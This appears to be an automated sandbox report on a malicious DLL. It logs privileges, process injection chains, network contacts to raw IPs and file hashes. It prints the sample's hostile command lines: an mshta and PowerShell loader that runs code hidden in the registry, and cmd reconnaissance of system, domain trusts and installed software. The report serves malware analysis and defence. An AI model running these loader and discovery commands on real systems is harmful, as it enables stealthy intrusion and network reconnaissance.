Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 852 wrote to memory of 1728 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 852 wrote to memory of 1728 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1728 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2004 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1728 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1728 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4568 wrote to memory of 3680 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4568 wrote to memory of 3680 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 4584 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4584 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4584 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4584 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4584 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4584 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2816 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2816 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2588 wrote to memory of 4360 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4360 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4180 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4180 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4180 wrote to memory of 676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4180 wrote to memory of 676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2588 wrote to memory of 4652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4836 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4836 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 4836 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2588 wrote to memory of 3548 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 3548 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"

Network

Country Destination Domain Proto
US 93.184.220.29:80 N/A tcp
NL 104.80.225.205:443 N/A tcp
FR 51.11.192.48:443 N/A tcp
US 13.107.42.16:80 config.edge.skype.com tcp
US 8.253.183.249:80 N/A tcp
US 8.253.183.249:80 N/A tcp
US 8.253.183.249:80 N/A tcp
US 8.253.183.249:80 N/A tcp
RO 37.120.206.71:80 37.120.206.71 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1952-130-0x0000000000000000-mapping.dmp

memory/1952-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1952-136-0x0000000001320000-0x000000000132D000-memory.dmp

memory/1728-140-0x0000000000000000-mapping.dmp

memory/1728-141-0x000002B3708B0000-0x000002B3708D2000-memory.dmp

memory/1728-142-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp

memory/2004-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline

MD5 12ecb4fb620b5882813954a0dd3bbe0c
SHA1 8c047cfed98be681a04acc40e09928d52eab01c7
SHA256 b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31
SHA512 c7a0e26b9f4ce49b05b49b1781ee34e952f493d1e6b9af284ca1a6ba200fff63c1a55630b9abc1baebb48c53d4f33a18b8822bccda6692e375a490f88b5b0833

\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/4544-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP

MD5 ba06d89e40a9d3b36e8ac118ce494371
SHA1 bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6
SHA256 fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393
SHA512 9b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d

C:\Users\Admin\AppData\Local\Temp\RES7417.tmp

MD5 4c841c934fa6a78ccf121587f366d0b6
SHA1 5a4488f8d588f94bcd62cc05baca0f9e20520784
SHA256 14f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7
SHA512 a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea

C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.dll

MD5 20304a71733030087e99660755f37ccf
SHA1 5a67e4c45d514c3fbec6fb68efa418f01978ec5b
SHA256 76f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3
SHA512 3053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1

memory/4568-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline

MD5 20b9b70df3d4658141b57560c7c22a38
SHA1 0a2352c94ecad22dcba6fa906f67b78dcf3deedc
SHA256 c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5
SHA512 4a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba

\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/3680-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP

MD5 c4def6b5c560f90a9d42b30035510659
SHA1 0d04c1cbda9e499aaa1f2119f0b7b084789e4574
SHA256 1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0
SHA512 258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f

C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp

MD5 392a9a94fc13026a8f63aba8c69dd50d
SHA1 bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa
SHA256 64d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70
SHA512 6827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197

C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll

MD5 b7802039aed10976472f4877a76f820e
SHA1 f678a9ee21f18009e0f0d1ddb984e49d36e34448
SHA256 b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530
SHA512 86433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc

memory/1728-157-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp

memory/1728-158-0x000002B370E20000-0x000002B370E5D000-memory.dmp

memory/2588-159-0x0000000008C40000-0x0000000008CE3000-memory.dmp

memory/4584-160-0x0000000000000000-mapping.dmp

memory/4752-161-0x0000000000000000-mapping.dmp

memory/3344-162-0x0000000000000000-mapping.dmp

memory/1984-163-0x0000000000000000-mapping.dmp

memory/4752-164-0x0000000000826B20-0x0000000000826B24-memory.dmp

memory/4752-165-0x00000000013F0000-0x0000000001486000-memory.dmp

memory/3396-166-0x0000023B70780000-0x0000023B70823000-memory.dmp

memory/3664-167-0x000002297F740000-0x000002297F7E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/2816-171-0x0000000000000000-mapping.dmp

memory/3520-169-0x000002A7FC800000-0x000002A7FC8A3000-memory.dmp

memory/4372-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/452-173-0x0000000000000000-mapping.dmp

memory/2588-174-0x0000000009160000-0x000000000929B000-memory.dmp

memory/2588-178-0x0000000009460000-0x000000000959A000-memory.dmp

memory/4360-182-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 6bb53db491181e660601e1440f5dc723
SHA1 c6691aaad8c7cc09fc3166e38e5c88330c50dae7
SHA256 3cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59
SHA512 56147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f

memory/4180-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 ba1cacc02ab4d42993da9e2a00150c4e
SHA1 a27f508c5a3ddd3c702157c07625d57a0ec44d39
SHA256 9c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366
SHA512 808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070

memory/676-186-0x0000000000000000-mapping.dmp

memory/2588-187-0x0000000008C40000-0x0000000008CE3000-memory.dmp

memory/4652-188-0x0000000000000000-mapping.dmp

memory/4836-189-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 5a48006096bd97eb23923e47e5a81f6a
SHA1 65d5f9e89cc05c17980eb41b0f609bf3e956bfa7
SHA256 889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60
SHA512 2d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9

memory/3660-191-0x0000000000000000-mapping.dmp

memory/3548-192-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 eb957e958d464123d032e63278336f4a
SHA1 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e
SHA256 fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013
SHA512 b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

memory/2040-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 eb957e958d464123d032e63278336f4a
SHA1 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e
SHA256 fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013
SHA512 b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

memory/1196-196-0x0000000000000000-mapping.dmp

memory/3320-197-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 c24e1e3d7e76a3f0190c8285a952ba2d
SHA1 20789bba0b334b28960a0810bc099fbb5af86618
SHA256 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5
SHA512 c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

memory/1300-199-0x0000000000000000-mapping.dmp

